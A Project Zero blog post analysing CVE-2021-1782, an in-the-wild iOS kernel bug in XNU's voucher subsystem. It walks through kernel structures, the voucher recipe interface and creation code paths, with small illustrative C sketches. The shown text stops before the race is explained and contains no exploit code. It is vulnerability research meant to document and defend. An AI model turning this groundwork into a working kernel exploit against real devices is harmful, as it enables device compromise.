CVE-2021-1782, an iOS in-the-wild vulnerability in vouchers

Posted by Ian Beer, Google Project Zero

This blog post is my analysis of a vulnerability exploited in the wild and patched in early 2021. Like the writeup published last week looking at an ASN.1 parser bug, this blog post is based on the notes I took as I was analyzing the patch and trying to understand the XNU vouchers subsystem. I hope that this writeup serves as the missing documentation for how some of the internals of the voucher subsystem work, and for the quirks which led to this vulnerability.

CVE-2021-1782 was fixed in iOS 14.4, as noted by @s1guza on twitter:

This vulnerability was fixed on January 26th 2021, and Apple updated the iOS 14.4 release notes on May 28th 2021 to indicate that the issue may have been actively exploited:

Vouchers

What exactly is a voucher?

The kernel code has a concise description:

Vouchers are a reference counted immutable (once-created) set of indexes to particular resource manager attribute values (which themselves are reference counted).

That definition is technically correct, though perhaps not all that helpful by itself.

Actually understanding the root cause and exploitability of this vulnerability requires covering a lot of the voucher codebase. This part of XNU is pretty obscure, and pretty complicated.

A voucher is a reference-counted table of keys and values. Pointers to all created vouchers are stored in the global ivht_bucket hash table.

For a particular set of keys and values there should only be one voucher object. During the creation of a voucher there is a deduplication stage where the new voucher is compared against all existing vouchers in the hashtable to ensure they remain unique, returning a reference to the existing voucher if a duplicate has been found.

Here's the structure of a voucher:

struct ipc_voucher {

iv_index_t iv_hash; /* checksum hash */

iv_index_t iv_sum; /* checksum of values */

os_refcnt_t iv_refs; /* reference count */

iv_index_t iv_table_size; /* size of the voucher table */

iv_index_t iv_inline_table[IV_ENTRIES_INLINE];

iv_entry_t iv_table; /* table of voucher attr entries */

ipc_port_t iv_port; /* port representing the voucher */

queue_chain_t iv_hash_link; /* link on hash chain */

};

#define IV_ENTRIES_INLINE MACH_VOUCHER_ATTR_KEY_NUM_WELL_KNOWN

The voucher codebase is written in a very generic, extensible way, even though its actual use and supported feature set is quite minimal.

Keys

Keys in vouchers are not arbitrary. Keys are indexes into a voucher's iv_table; a value's position in the iv_table table determines what "key" it was stored under. Whilst the vouchers codebase supports the runtime addition of new key types this feature isn't used and there are just a small number of fixed, well-known keys:

#define MACH_VOUCHER_ATTR_KEY_ALL ((mach_voucher_attr_key_t)~0)

#define MACH_VOUCHER_ATTR_KEY_NONE ((mach_voucher_attr_key_t)0)

/* other well-known-keys will be added here */

#define MACH_VOUCHER_ATTR_KEY_ATM ((mach_voucher_attr_key_t)1)

#define MACH_VOUCHER_ATTR_KEY_IMPORTANCE ((mach_voucher_attr_key_t)2)

#define MACH_VOUCHER_ATTR_KEY_BANK ((mach_voucher_attr_key_t)3)

#define MACH_VOUCHER_ATTR_KEY_PTHPRIORITY ((mach_voucher_attr_key_t)4)

#define MACH_VOUCHER_ATTR_KEY_USER_DATA ((mach_voucher_attr_key_t)7)

#define MACH_VOUCHER_ATTR_KEY_TEST ((mach_voucher_attr_key_t)8)

#define MACH_VOUCHER_ATTR_KEY_NUM_WELL_KNOWN MACH_VOUCHER_ATTR_KEY_TEST

The iv_inline_table in an ipc_voucher has 8 entries. But of those, only four are actually supported and have any associated functionality. The ATM voucher attributes are deprecated and the code supporting them is gone so only IMPORTANCE (2), BANK (3), PTHPRIORITY (4) and USER_DATA (7) are valid keys. There's some confusion (perhaps on my part) about when exactly you should use the term key and when attribute; I'll use them interchangeably to refer to these key values and the corresponding "types" of values which they manage. More on that later.

Values

Each entry in a voucher iv_table is an iv_index_t:

typedef natural_t iv_index_t;

Each value is again an index; this time into a per-key cache of values, abstracted as a "Voucher Attribute Cache Control Object" represented by this structure:

struct ipc_voucher_attr_control {

os_refcnt_t ivac_refs;

boolean_t ivac_is_growing; /* is the table being grown */

ivac_entry_t ivac_table; /* table of voucher attr value entries */

iv_index_t ivac_table_size; /* size of the attr value table */

iv_index_t ivac_init_table_size; /* size of the attr value table */

iv_index_t ivac_freelist; /* index of the first free element */

ipc_port_t ivac_port; /* port for accessing the cache control */

lck_spin_t ivac_lock_data;

iv_index_t ivac_key_index; /* key index for this value */

};

These are accessed indirectly via another global table:

static ipc_voucher_global_table_element iv_global_table[MACH_VOUCHER_ATTR_KEY_NUM_WELL_KNOWN];

(Again, the comments in the code indicate that in the future this table may grow in size and allow attributes to be managed in userspace, but for now it's just a fixed size array.)

Each element in that table has this structure:

typedef struct ipc_voucher_global_table_element {

ipc_voucher_attr_manager_t ivgte_manager;

ipc_voucher_attr_control_t ivgte_control;

mach_voucher_attr_key_t ivgte_key;

} ipc_voucher_global_table_element;

Both the iv_global_table and each voucher's iv_table are indexed by (key-1), not key, so the userdata entry is [6], not [7], even though the array still has 8 entries.
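To make the (key-1) indexing concrete, here's a minimal userspace sketch. The key values are copied from the list of well-known keys above; the helper names key_to_slot and key_is_supported and the SLOT_INVALID sentinel are made up for this illustration and are not XNU identifiers.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* Key values copied from the well-known key list above. */
enum {
    KEY_NONE = 0, KEY_ATM = 1, KEY_IMPORTANCE = 2, KEY_BANK = 3,
    KEY_PTHPRIORITY = 4, KEY_USER_DATA = 7, KEY_TEST = 8,
    KEY_NUM_WELL_KNOWN = KEY_TEST
};

#define SLOT_INVALID UINT32_MAX /* hypothetical sentinel, not an XNU name */

/* Hypothetical helper: map a key to its slot in a (key - 1)-indexed table. */
static uint32_t key_to_slot(uint32_t key)
{
    if (key == KEY_NONE || key > KEY_NUM_WELL_KNOWN) {
        return SLOT_INVALID;
    }
    return key - 1;
}

/* Hypothetical helper: true for the four keys described as supported. */
static bool key_is_supported(uint32_t key)
{
    return key == KEY_IMPORTANCE || key == KEY_BANK ||
           key == KEY_PTHPRIORITY || key == KEY_USER_DATA;
}
```

With these definitions key_to_slot(KEY_USER_DATA) is 6 and key_to_slot(KEY_TEST) is 7, the last slot of an 8-entry table.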

The ipc_voucher_attr_control_t provides an abstract interface for managing "values" and the ipc_voucher_attr_manager_t provides the "type-specific" logic to implement the semantics of each type (here by type I mean "key" or "attr" type.) Let's look more concretely at what that means. Here's the definition of ipc_voucher_attr_manager_t:

struct ipc_voucher_attr_manager {

ipc_voucher_attr_manager_release_value_t ivam_release_value;

ipc_voucher_attr_manager_get_value_t ivam_get_value;

ipc_voucher_attr_manager_extract_content_t ivam_extract_content;

ipc_voucher_attr_manager_command_t ivam_command;

ipc_voucher_attr_manager_release_t ivam_release;

ipc_voucher_attr_manager_flags ivam_flags;

};

ivam_flags is an int containing some flags; the other five fields are function pointers which define the semantics of the particular attr type. Here's the ipc_voucher_attr_manager structure for the user_data type:

const struct ipc_voucher_attr_manager user_data_manager = {

.ivam_release_value = user_data_release_value,

.ivam_get_value = user_data_get_value,

.ivam_extract_content = user_data_extract_content,

.ivam_command = user_data_command,

.ivam_release = user_data_release,

.ivam_flags = IVAM_FLAGS_NONE,

};

Those five function pointers are the only interface from the generic voucher code into the type-specific code. The interface may seem simple but there are some tricky subtleties in there; we'll get to that later!
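The split between generic code and type-specific code is an ordinary table-of-function-pointers design. The following is only a toy model of that shape: the struct has two callbacks instead of five, the signatures are heavily simplified, and every name (toy_manager, toy_sum_get_value, generic_make_value) is invented for the example.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

typedef uint64_t value_handle_t;

/* Toy manager: two callbacks with simplified, made-up signatures. */
struct toy_manager {
    int (*get_value)(const uint8_t *content, size_t size, value_handle_t *out);
    int (*release_value)(value_handle_t value);
};

/* A toy "type": its value is just the sum of the content bytes. */
static int toy_sum_get_value(const uint8_t *content, size_t size, value_handle_t *out)
{
    value_handle_t sum = 0;
    for (size_t i = 0; i < size; i++) {
        sum += content[i];
    }
    *out = sum;
    return 0;
}

static int toy_sum_release_value(value_handle_t value)
{
    (void)value; /* nothing to free for this toy type */
    return 0;
}

static const struct toy_manager toy_sum_manager = {
    .get_value     = toy_sum_get_value,
    .release_value = toy_sum_release_value,
};

/* Generic layer: it only knows the table, not the type behind it. */
static int generic_make_value(const struct toy_manager *m,
    const uint8_t *content, size_t size, value_handle_t *out)
{
    return m->get_value(content, size, out);
}
```

The generic layer never inspects the handle it gets back; it only stores and compares it, which is the property the rest of this section relies on.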

Let's go back to the generic ipc_voucher_attr_control structure which maintains the "values" for each key in a type-agnostic way. The most important field is ivac_entry_t ivac_table, which is an array of ivac_entry_s's. It's an index into this table which is stored in each voucher's iv_table.

Here's the structure of each entry in that table:

struct ivac_entry_s {

iv_value_handle_t ivace_value;

iv_value_refs_t ivace_layered:1, /* layered effective entry */

ivace_releasing:1, /* release in progress */

ivace_free:1, /* on freelist */

ivace_persist:1, /* Persist the entry, don't

count made refs */

ivace_refs:28; /* reference count */

union {

iv_value_refs_t ivaceu_made; /* made count (non-layered) */

iv_index_t ivaceu_layer; /* next effective layer

(layered) */

} ivace_u;

iv_index_t ivace_next; /* hash or freelist */

iv_index_t ivace_index; /* hash head (independent) */

};

ivace_refs is a reference count for this table index. Note that this entry is inline in an array; so this reference count going to zero doesn't cause the ivac_entry_s to be free'd back to a kernel allocator (like the zone allocator for example.) Instead, it moves this table index onto a freelist of empty entries. The table can grow but never shrink.
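As a rough model of that behaviour, here's a fixed-size table whose free slots are threaded together by index. It is a sketch under simplifying assumptions: the table never grows, there is no locking, and all names (toy_table, toy_table_take, toy_table_release, FREELIST_END) are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

#define TABLE_SIZE   4u
#define FREELIST_END UINT32_MAX /* hypothetical sentinel */

struct toy_entry {
    uint64_t value;
    uint32_t refs;
    uint32_t next;    /* next free index while on the freelist */
    int      is_free;
};

struct toy_table {
    struct toy_entry entries[TABLE_SIZE];
    uint32_t freelist; /* index of the first free entry */
};

static void toy_table_init(struct toy_table *t)
{
    for (uint32_t i = 0; i < TABLE_SIZE; i++) {
        t->entries[i].value = 0;
        t->entries[i].refs = 0;
        t->entries[i].is_free = 1;
        t->entries[i].next = (i + 1 < TABLE_SIZE) ? i + 1 : FREELIST_END;
    }
    t->freelist = 0;
}

/* Pop a free slot for value; returns FREELIST_END if the table is full. */
static uint32_t toy_table_take(struct toy_table *t, uint64_t value)
{
    uint32_t index = t->freelist;
    if (index == FREELIST_END) {
        return FREELIST_END;
    }
    struct toy_entry *e = &t->entries[index];
    t->freelist = e->next;
    e->value = value;
    e->refs = 1;
    e->is_free = 0;
    e->next = FREELIST_END;
    return index;
}

/* Drop one reference. At zero the slot is pushed back onto the
 * freelist; the memory itself is never returned to an allocator. */
static void toy_table_release(struct toy_table *t, uint32_t index)
{
    struct toy_entry *e = &t->entries[index];
    assert(!e->is_free && e->refs > 0);
    if (--e->refs == 0) {
        e->value = 0;
        e->is_free = 1;
        e->next = t->freelist;
        t->freelist = index;
    }
}
```

Note that a released index is the first one handed out again, so a stale index held elsewhere would silently refer to whatever value is stored there next.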

Table entries which aren't free store a type-specific "handle" in ivace_value. Here's the typedef chain for that type:

iv_value_handle_t ivace_value

typedef mach_voucher_attr_value_handle_t iv_value_handle_t;

typedef uint64_t mach_voucher_attr_value_handle_t;

The handle is a uint64_t but in reality the attrs can (and do) store pointers there, hidden behind casts.
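The "pointer hidden behind a cast" idiom looks roughly like this in isolation. The type and function names here are invented for the sketch; only the idea of round-tripping a pointer through a 64-bit integer handle comes from the text above.

```c
#include <assert.h>
#include <stdint.h>

typedef uint64_t toy_handle_t;

struct toy_element {
    uint32_t made;
    uint32_t size;
};

/* Type-specific code hands out an opaque integer... */
static toy_handle_t element_to_handle(struct toy_element *e)
{
    return (toy_handle_t)(uintptr_t)e;
}

/* ...and casts it back when the generic layer passes it in again. */
static struct toy_element *handle_to_element(toy_handle_t h)
{
    return (struct toy_element *)(uintptr_t)h;
}
```

Because the generic layer compares handles as plain integers, two handles are "the same value" only if they are the same pointer.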

A guarantee made by the attr_control is that there will only ever be one (live) ivac_entry_s for a particular ivace_value. This means that each time a new ivace_value needs an ivac_entry the attr_control's ivac_table needs to be searched to see if a matching value is already present. To speed this up in-use ivac_entries are linked together in hash buckets so that a (hopefully significantly) shorter linked-list of entries can be searched rather than a linear scan of the whole table. (Note that it's not a linked-list of pointers; each link in the chain is an index into the table.)
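Here's a small sketch of a hash chain built from table indexes rather than pointers. It assumes a trivial modulo hash and a fixed table size, neither of which is taken from XNU, and the names (toy_slot, toy_insert, toy_find, CHAIN_END) are hypothetical. As in the structure above, each slot carries both a "next" link and the head of the chain for the bucket with that slot's index.

```c
#include <assert.h>
#include <stdint.h>

#define TOY_SIZE  8u
#define CHAIN_END UINT32_MAX /* hypothetical end-of-chain marker */

struct toy_slot {
    uint64_t value;
    uint32_t next; /* next slot index in the same chain */
    uint32_t head; /* head of the chain for bucket == this slot's index */
};

/* Assumed hash for the sketch: value modulo the table size. */
static uint32_t toy_bucket(uint64_t value)
{
    return (uint32_t)(value % TOY_SIZE);
}

static void toy_init(struct toy_slot *table)
{
    for (uint32_t i = 0; i < TOY_SIZE; i++) {
        table[i].value = 0;
        table[i].next = CHAIN_END;
        table[i].head = CHAIN_END;
    }
}

/* Link slot index (chosen by the caller) at the front of its chain. */
static void toy_insert(struct toy_slot *table, uint32_t index, uint64_t value)
{
    uint32_t b = toy_bucket(value);
    table[index].value = value;
    table[index].next = table[b].head;
    table[b].head = index;
}

/* Walk one chain by index; returns CHAIN_END if value is absent. */
static uint32_t toy_find(const struct toy_slot *table, uint64_t value)
{
    uint32_t index = table[toy_bucket(value)].head;
    while (index != CHAIN_END && table[index].value != value) {
        index = table[index].next;
    }
    return index;
}
```

Using indexes instead of pointers means the links stay valid even if the whole table is reallocated at a different address when it grows.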

Userdata attrs

user_data is one of the four supported, implemented voucher attr types. Its only purpose is to manage buffers of arbitrary, user-controlled data. Since the attr_control performs deduping only on the ivace_value (which is a pointer), the userdata attr manager is responsible for ensuring that userdata values which have identical buffer contents (matching length and bytes) have identical pointers.

To do this it maintains a hash table of user_data_value_element structures, which wrap a variable-sized buffer of bytes:

struct user_data_value_element {

mach_voucher_attr_value_reference_t e_made;

mach_voucher_attr_content_size_t e_size;

iv_index_t e_sum;

iv_index_t e_hash;

queue_chain_t e_hash_link;

uint8_t e_data[];

};

Each inline e_data buffer can be up to 16KB. e_hash_link stores the hash-table bucket list pointer.
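For readers unfamiliar with the trailing e_data[] idiom, here's a minimal userspace sketch of allocating a header plus inline payload in one block. It uses malloc rather than a kernel allocator, drops the hash fields, and the names toy_element, toy_element_create and TOY_MAX_DATA are made up; the 16KB cap mirrors the limit mentioned above.

```c
#include <assert.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

#define TOY_MAX_DATA (16u * 1024u) /* mirrors the 16KB limit described above */

struct toy_element {
    uint32_t made;
    uint32_t size;
    uint8_t  data[]; /* flexible array member: payload lives inline */
};

/* Allocate header and payload together; NULL on empty, oversized or OOM. */
static struct toy_element *toy_element_create(const uint8_t *content, uint32_t size)
{
    if (size == 0 || size > TOY_MAX_DATA) {
        return NULL;
    }
    struct toy_element *e = malloc(sizeof(*e) + size);
    if (e == NULL) {
        return NULL;
    }
    e->made = 1;
    e->size = size;
    memcpy(e->data, content, size);
    return e;
}
```

The allocation size depends directly on the caller-supplied length, which is what makes this kind of object interesting from a heap-layout point of view.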

e_made is not a simple reference count. Looking through the code you'll notice that there are no places where it's ever decremented. Since there should (nearly) always be a 1:1 mapping between an ivac_entry_s and a user_data_value_element this structure shouldn't need to be reference counted. There is however one very fiddly race condition (which isn't the race condition which causes the vulnerability!) which necessitates the e_made field. This race condition is sort-of documented and we'll get there eventually...

Recipes

The host_create_mach_voucher host port MIG (Mach Interface Generator) method is the userspace interface for creating vouchers:

kern_return_t

host_create_mach_voucher(mach_port_name_t host,

mach_voucher_attr_raw_recipe_array_t recipes,

mach_voucher_attr_recipe_size_t recipesCnt,

mach_port_name_t *voucher);

recipes points to a buffer filled with a sequence of packed variable-size mach_voucher_attr_recipe_data structures:

typedef struct mach_voucher_attr_recipe_data {

mach_voucher_attr_key_t key;

mach_voucher_attr_recipe_command_t command;

mach_voucher_name_t previous_voucher;

mach_voucher_attr_content_size_t content_size;

uint8_t content[];

} mach_voucher_attr_recipe_data_t;

key is one of the four supported voucher attr types we've seen before (importance, bank, pthread_priority and user_data) or a wildcard value (MACH_VOUCHER_ATTR_KEY_ALL) indicating that the command should apply to all keys. There are a number of generic commands as well as type-specific commands. Commands can optionally refer to existing vouchers via the previous_voucher field, which should name a voucher port.

Here are the supported generic commands for voucher creation:

MACH_VOUCHER_ATTR_COPY: copy the attr value from the previous voucher. You can specify the wildcard key to copy all the attr values from the previous voucher.

MACH_VOUCHER_ATTR_REMOVE: remove the specified attr value from the voucher under construction. This can also remove all the attributes from the voucher under construction (which, arguably, makes no sense.)

MACH_VOUCHER_ATTR_SET_VALUE_HANDLE: this command is only valid for kernel clients; it allows the caller to specify an arbitrary ivace_value, which doesn't make sense for userspace and shouldn't be reachable.

MACH_VOUCHER_ATTR_REDEEM: the semantics of redeeming an attribute from a previous voucher are not defined by the voucher code; it's up to the individual managers to determine what that might mean.

Here are the attr-specific commands for voucher creation for each type:

bank:

MACH_VOUCHER_ATTR_BANK_CREATE

MACH_VOUCHER_ATTR_BANK_MODIFY_PERSONA

MACH_VOUCHER_ATTR_AUTO_REDEEM

MACH_VOUCHER_ATTR_SEND_PREPROCESS

importance:

MACH_VOUCHER_ATTR_IMPORTANCE_SELF

user_data:

MACH_VOUCHER_ATTR_USER_DATA_STORE

pthread_priority:

MACH_VOUCHER_ATTR_PTHPRIORITY_CREATE

Note that there are further commands which can be "executed against" vouchers via the mach_voucher_attr_command MIG method which calls the attr manager's ivam_command function pointer. Those are:

bank:

BANK_ORIGINATOR_PID

BANK_PERSONA_TOKEN

BANK_PERSONA_ID

importance:

MACH_VOUCHER_IMPORTANCE_ATTR_DROP_EXTERNAL

user_data:

none

pthread_priority:

none

Let's look at an example recipe for creating a voucher with a single user_data attr, consisting of the 4 bytes {0x41, 0x41, 0x41, 0x41}:

struct udata_dword_recipe {

mach_voucher_attr_recipe_data_t recipe;

uint32_t payload;

};

struct udata_dword_recipe r = {0};

r.recipe.key = MACH_VOUCHER_ATTR_KEY_USER_DATA;

r.recipe.command = MACH_VOUCHER_ATTR_USER_DATA_STORE;

r.recipe.content_size = sizeof(uint32_t);

r.payload = 0x41414141;
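Since a recipe buffer can hold several packed sub-recipes, it can help to see how one might be assembled by hand. This is a portable sketch that doesn't use the Mach headers: toy_recipe_hdr is a local stand-in for the fixed part of mach_voucher_attr_recipe_data, the assumption that all four fields are 32 bits wide is mine, and toy_recipe_append is a hypothetical helper.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Local stand-in for the fixed-size part of a sub-recipe.
 * Assumption: four 32-bit fields, followed directly by the content. */
struct toy_recipe_hdr {
    uint32_t key;
    uint32_t command;
    uint32_t previous_voucher;
    uint32_t content_size;
};

/* Append one sub-recipe at offset used. Returns the new offset,
 * or 0 if the header plus content does not fit in the buffer. */
static size_t toy_recipe_append(uint8_t *buf, size_t cap, size_t used,
    uint32_t key, uint32_t command, uint32_t prev,
    const void *content, uint32_t content_size)
{
    struct toy_recipe_hdr hdr = { key, command, prev, content_size };

    if (used > cap || cap - used < sizeof(hdr) ||
        cap - used - sizeof(hdr) < content_size) {
        return 0;
    }
    memcpy(buf + used, &hdr, sizeof(hdr));
    if (content_size != 0) {
        memcpy(buf + used + sizeof(hdr), content, content_size);
    }
    return used + sizeof(hdr) + content_size;
}
```

Calling the helper repeatedly with the offset it returned yields a packed sequence; on a real system the buffer and its final length would be what goes into the recipes and recipesCnt arguments.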

Let's follow the path of this recipe in detail.

Here's the most important part of host_create_mach_voucher showing the three high-level phases: voucher allocation, attribute creation and voucher de-duping. It's not the responsibility of this code to find or allocate a mach port for the voucher; that's done by the MIG layer code.

/* allocate new voucher */

voucher = iv_alloc(ivgt_keys_in_use);

if (IV_NULL == voucher) {

return KERN_RESOURCE_SHORTAGE;

}

/* iterate over the recipe items */

while (0 < recipe_size - recipe_used) {

ipc_voucher_t prev_iv;

if (recipe_size - recipe_used < sizeof(*sub_recipe)) {

kr = KERN_INVALID_ARGUMENT;

break;

}

/* find the next recipe */

sub_recipe =

(mach_voucher_attr_recipe_t)(void *)&recipes[recipe_used];

if (recipe_size - recipe_used - sizeof(*sub_recipe) <

sub_recipe->content_size) {

kr = KERN_INVALID_ARGUMENT;

break;

}

recipe_used += sizeof(*sub_recipe) + sub_recipe->content_size;

/* convert voucher port name (current space) */

/* into a voucher reference */

prev_iv =

convert_port_name_to_voucher(sub_recipe->previous_voucher);

if (MACH_PORT_NULL != sub_recipe->previous_voucher &&

IV_NULL == prev_iv) {

kr = KERN_INVALID_CAPABILITY;

break;

}

kr = ipc_execute_voucher_recipe_command(

voucher,

sub_recipe->key,

sub_recipe->command,

prev_iv,

sub_recipe->content,

sub_recipe->content_size,

FALSE);

ipc_voucher_release(prev_iv);

if (KERN_SUCCESS != kr) {

break;

}

}

if (KERN_SUCCESS == kr) {

*new_voucher = iv_dedup(voucher);

} else {

*new_voucher = IV_NULL;

iv_dealloc(voucher, FALSE);

}

At the top of this snippet a new voucher is allocated in iv_alloc. ipc_execute_voucher_recipe_command is then called in a loop to consume however many sub-recipe structures were provided by userspace. Each sub-recipe can optionally refer to an existing voucher via its previous_voucher field. Note that MIG doesn't natively support variable-sized structures containing ports, so the voucher is passed as a mach port name which is looked up in the calling task's mach port namespace and converted to a voucher reference by convert_port_name_to_voucher. The intended functionality here is to be able to refer to attrs in other vouchers to copy or "redeem" them. As discussed, the semantics of redeeming a voucher attr aren't defined by the abstract voucher code and it's up to the individual attr managers to decide what that means.
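The two bounds checks in that loop are the only thing standing between userspace-controlled sizes and out-of-bounds reads, so here's the same walk reduced to a userspace model. It only counts sub-recipes instead of executing them; toy_recipe_hdr (four 32-bit fields, an assumption) and toy_count_sub_recipes are hypothetical names.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Assumed layout of the fixed part of a sub-recipe. */
struct toy_recipe_hdr {
    uint32_t key;
    uint32_t command;
    uint32_t previous_voucher;
    uint32_t content_size;
};

/* Walk a packed recipe buffer. Returns the number of well-formed
 * sub-recipes, or -1 if a header or its content is truncated. */
static int toy_count_sub_recipes(const uint8_t *recipes, size_t recipe_size)
{
    size_t used = 0;
    int count = 0;

    while (recipe_size - used > 0) {
        struct toy_recipe_hdr hdr;

        /* Is there room for a whole header? */
        if (recipe_size - used < sizeof(hdr)) {
            return -1;
        }
        memcpy(&hdr, recipes + used, sizeof(hdr)); /* avoids unaligned reads */

        /* Is there room for the content the header claims? */
        if (recipe_size - used - sizeof(hdr) < hdr.content_size) {
            return -1;
        }
        used += sizeof(hdr) + hdr.content_size;
        count++;
    }
    return count;
}
```

Both checks are written as subtractions from the remaining length rather than additions to the offset, so a huge content_size can't wrap around and pass the comparison.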

Once the entire recipe has been consumed and all the iv_table entries filled in, iv_dedup then searches the ivht_bucket hash table to see if there's an existing voucher with a matching set of attributes. Remember that each attribute value stored in a voucher is an index into the attribute controller's attribute table; and those attributes are unique, so it suffices to simply compare the array of voucher indexes to determine whether all attribute values are equal. If a matching voucher is found, iv_dedup returns a reference to the existing voucher and calls iv_dealloc to free the newly created voucher. Otherwise, if no existing, matching voucher is found, iv_dedup adds the newly created voucher to the ivht_bucket hash table.
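The key observation is that voucher equality reduces to comparing small arrays of indexes. The sketch below models just that, under loud simplifications: a flat array stands in for the ivht_bucket hash table, there's no locking, and the names (toy_voucher, toy_known, toy_dedup) are invented.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define TOY_KEYS         8u
#define TOY_MAX_VOUCHERS 16u

struct toy_voucher {
    uint32_t table[TOY_KEYS]; /* one value index per key slot */
    uint32_t refs;
};

/* Flat list standing in for the global voucher hash table. */
static struct toy_voucher *toy_known[TOY_MAX_VOUCHERS];
static size_t toy_known_count;

/* Return an existing voucher with identical indexes (taking a
 * reference), or register candidate as new. NULL if the list is full. */
static struct toy_voucher *toy_dedup(struct toy_voucher *candidate)
{
    for (size_t i = 0; i < toy_known_count; i++) {
        if (memcmp(toy_known[i]->table, candidate->table,
            sizeof(candidate->table)) == 0) {
            toy_known[i]->refs++;
            return toy_known[i]; /* caller discards candidate */
        }
    }
    if (toy_known_count == TOY_MAX_VOUCHERS) {
        return NULL;
    }
    candidate->refs = 1;
    toy_known[toy_known_count++] = candidate;
    return candidate;
}
```

This shortcut is only sound because the layer below guarantees one index per distinct value; if that guarantee ever breaks, so does voucher uniqueness.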

Let's look at ipc_execute_voucher_recipe_command which is responsible for filling in the requested entries in the voucher iv_table. Note that key and command are arbitrary, controlled dwords. content is a pointer to a buffer of controlled bytes, and content_size is the correct size of that input buffer. The MIG layer limits the overall input size of the recipe (which is a collection of sub-recipes) to 5260 bytes, and any input content buffers would have to fit in there.

static kern_return_t

ipc_execute_voucher_recipe_command(

ipc_voucher_t voucher,

mach_voucher_attr_key_t key,

mach_voucher_attr_recipe_command_t command,

ipc_voucher_t prev_iv,

mach_voucher_attr_content_t content,

mach_voucher_attr_content_size_t content_size,

boolean_t key_priv)

{

iv_index_t prev_val_index;

iv_index_t val_index;

kern_return_t kr;

switch (command) {

MACH_VOUCHER_ATTR_USER_DATA_STORE isn't one of the switch statement case values here so the code ends up in the default case:

default:

kr = ipc_replace_voucher_value(voucher,

key,

command,

prev_iv,

content,

content_size);

if (KERN_SUCCESS != kr) {

return kr;

}

break;

}

return KERN_SUCCESS;

Here's that code:

static kern_return_t

ipc_replace_voucher_value(

ipc_voucher_t voucher,

mach_voucher_attr_key_t key,

mach_voucher_attr_recipe_command_t command,

ipc_voucher_t prev_voucher,

mach_voucher_attr_content_t content,

mach_voucher_attr_content_size_t content_size)

{

...

/*

* Get the manager for this key_index.

* Returns a reference on the control.

*/

key_index = iv_key_to_index(key);

ivgt_lookup(key_index, TRUE, &ivam, &ivac);

if (IVAM_NULL == ivam) {

return KERN_INVALID_ARGUMENT;

}

iv_key_to_index just subtracts 1 from key (assuming it's valid and not MACH_VOUCHER_ATTR_KEY_ALL):

static inline iv_index_t

iv_key_to_index(mach_voucher_attr_key_t key)

{

if (MACH_VOUCHER_ATTR_KEY_ALL == key ||

MACH_VOUCHER_ATTR_KEY_NUM_WELL_KNOWN < key) {

return IV_UNUSED_KEYINDEX;

}

return (iv_index_t)key - 1;

}

ivgt_lookup then gets a reference on that key's attr manager and attr controller. The manager is really just a bunch of function pointers which define the semantics of what different "key types" actually mean; and the controller stores (and caches) values for those keys.

Let's keep reading ipc_replace_voucher_value. Here's the next statement:

/* save the current value stored in the forming voucher */

save_val_index = iv_lookup(voucher, key_index);

This point is important for getting a good feeling for how the voucher code is supposed to work; recipes can refer not only to other vouchers (via the previous_voucher port) but they can also refer to themselves during creation. You don't have to have just one sub-recipe per attr type for which you wish to have a value in your voucher; you can specify multiple sub-recipes for that type. Does it actually make any sense to do that? Well, luckily for the security researcher we don't have to worry about whether functionality actually makes any sense; it's all just a weird machine to us! (There are allusions in the code to future functionality where attribute values can be "layered" or "linked" but for now such functionality doesn't exist.)

iv_lookup returns the "value index" for the given key in the particular voucher. That means it just returns the iv_index_t in the iv_table of the given voucher:

static inline iv_index_t

iv_lookup(ipc_voucher_t iv, iv_index_t key_index)

{

if (key_index < iv->iv_table_size) {

return iv->iv_table[key_index];

}

return IV_UNUSED_VALINDEX;

}

This value index uniquely identifies an existing attribute value, but you need to ask the attribute's controller for the actual value. Before getting that previous value though, the code first determines whether this sub-recipe might be trying to refer to the value currently stored by this voucher or has explicitly passed in a previous_voucher. The value in the previous voucher takes precedence over whatever is already in the under-construction voucher.

prev_val_index = (IV_NULL != prev_voucher) ?

iv_lookup(prev_voucher, key_index) :

save_val_index;

Then the code looks up the actual previous value to operate on:

ivace_lookup_values(key_index, prev_val_index,

previous_vals, &previous_vals_count);

key_index is the table index of the key we're operating on (MACH_VOUCHER_ATTR_KEY_USER_DATA minus one, so 6, in this example). This function is called ivace_lookup_values (note the plural). There are some comments in the voucher code indicating that maybe in the future values could themselves be put into a linked-list such that you could have larger values (or layered/chained values.) But this functionality isn't implemented; ivace_lookup_values will only ever return 1 value.

Here's ivace_lookup_values:

static void

ivace_lookup_values(

iv_index_t key_index,

iv_index_t value_index,

mach_voucher_attr_value_handle_array_t values,

mach_voucher_attr_value_handle_array_size_t *count)

{

ipc_voucher_attr_control_t ivac;

ivac_entry_t ivace;

if (IV_UNUSED_VALINDEX == value_index ||

MACH_VOUCHER_ATTR_KEY_NUM_WELL_KNOWN <= key_index) {

*count = 0;

return;

}

ivac = iv_global_table[key_index].ivgte_control;

assert(IVAC_NULL != ivac);

/* Get the entry and then the linked values. */

ivac_lock(ivac);

assert(value_index < ivac->ivac_table_size);

ivace = &ivac->ivac_table[value_index];

/* TODO: support chained values (for effective vouchers). */

assert(ivace->ivace_refs > 0);

values[0] = ivace->ivace_value;

ivac_unlock(ivac);

*count = 1;

}

The locking used in the vouchers code is very important for properly understanding the underlying vulnerability when we eventually get there, but for now I'm glossing over it and we'll return to examine the relevant locks when necessary.

Let's discuss the ivace_lookup_values code. It indexes the iv_global_table to get a pointer to the attribute type's controller:

ivac = iv_global_table[key_index].ivgte_control;

It then takes that controller's lock, indexes its ivac_table to find that value's struct ivac_entry_s and reads the ivace_value from there:

ivac_lock(ivac);

assert(value_index < ivac->ivac_table_size);

ivace = &ivac->ivac_table[value_index];

assert(ivace->ivace_refs > 0);

values[0] = ivace->ivace_value;

ivac_unlock(ivac);

*count = 1;

Let's go back to the calling function (ipc_replace_voucher_value) and keep reading:

/* Call out to resource manager to get new value */

new_value_voucher = IV_NULL;

kr = (ivam->ivam_get_value)(

ivam, key, command,

previous_vals, previous_vals_count,

content, content_size,

&new_value, &new_flag, &new_value_voucher);

if (KERN_SUCCESS != kr) {

ivac_release(ivac);

return kr;

}

